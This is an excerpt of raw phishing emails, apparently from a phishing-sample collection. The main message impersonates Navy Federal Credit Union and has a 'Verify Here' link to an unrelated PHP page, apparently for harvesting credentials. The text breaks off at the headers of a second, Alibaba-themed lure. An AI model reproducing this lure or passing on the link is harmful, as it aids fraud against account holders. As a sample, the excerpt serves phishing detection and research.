From: =?UTF-8?Q?Online_Banking?= <noreply_notice@navy_customer.com>
Subject: =?UTF-8?Q?Navy_Federal_Credit_Union?=
Message-ID: <1c53ae69565348496b39c786d1e81ef4@maudygroup.com>
X-Priority: 3
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset="us-ascii"
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - host.jamkrida-online.co.id
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [1022 994] / [47 12]
X-AntiAbuse: Sender Address Domain - host.jamkrida-online.co.id
X-Get-Message-Sender-Via: host.jamkrida-online.co.id: authenticated_id: maudygroup/primary_hostname/system user
X-Authenticated-Sender: host.jamkrida-online.co.id: maudygroup
X-Source: /opt/cpanel/ea-php56/root/usr/bin/php-cgi
X-Source-Args: /opt/cpanel/ea-php56/root/usr/bin/php-cgi 
X-Source-Dir: maudygroup.com:/public_html
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 420

<div id=3D":g3" class=3D"a3s aXjCH m15fc322ba5efa909"><b>Notice of payment<=
/b><br><br>

Please find enclosed copy to verify the status of <br>
pending deposits made to your savings account.<div class=3D"yj6qo"></div><d=
iv class=3D"adL"><br>
</div></div>=20

=09=09=09
=09=09=09=09=09=09<a href=3D"http://www.flae.org/bs.php" target=3D"_blank">=
                               Verify Here
</p><div style=3D"overflow:hidden"><span style=3D"font-size:11.0pt;font-fam=
ily:Arial;color:navy"><div>
</div><p>
Navy Federal Credit Union

From jose@monkey.org Mon Feb 12 22:44:02 2018 +0000
Return-Path: prime@sujatashah.nazwa.pl
Delivered-To: jose@monkey.org
X-FDA: 73833930324.34.clock85_404e351a9b314
X-Spam-Summary: 75,0,0,6e768db66f6a8dbd,d41d8cd98f00b204,prime@sujatashah.nazwa.pl,:,RULES_HIT:4:41:72:152:379:455:800:962:967:969:973:983:988:989:1189:1208:1221:1254:1260:1263:1313:1314:1362:1381:1390:1430:1431:1432:1433:1434:1436:1437:1461:1516:1517:1518:1571:1575:1588:1589:1592:1594:1685:1710:1719:1730:1744:1776:1792:2069:2070:2194:2196:2198:2199:2200:2201:2525:2527:2568:2610:2639:2682:2685:2693:2731:2737:2743:2827:2859:2902:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3173:3352:3586:3863:3867:3870:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4180:4181:4250:4321:4361:4605:5007:6117:6119:6248:6261:6650:6669:6671:6672:6678:6703:6996:6997:7210:7652:7872:8513:8514:8518:8568:8599:8603:8784:8957:8985:9010:9025:9072:9080:9121:9388:9908:10004:10030:10049:10234:10346:10394:11026:11232:11233:11256:11257:11473:11480:11657:11658:11783:11914:12043:12438:12555:12663:12679:12740:12776:12895:12903:12986:13007:13008:13018:13019:13139:13163:131
X-HE-Tag: clock85_404e351a9b314
X-Filterd-Recvd-Size: 16935
Received: from sujatashah.localdomain (ain166.rev.netart.pl [77.55.221.166])
	by imf19.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 12 Feb 2018 22:44:01 +0000 (UTC)
Received: from [185.204.216.92] (unknown [185.204.216.92])
	by sujatashah.localdomain (Postfix) with ESMTPA id 0E23C290224B
	for <jose@monkey.org>; Mon, 12 Feb 2018 19:42:29 +0100 (CET)
Content-Type: multipart/alternative; boundary="===============0898569640=="
MIME-Version: 1.0
Subject: [Alibaba Notification] Emily Yan has sent you an inquiry
To: jose@monkey.org
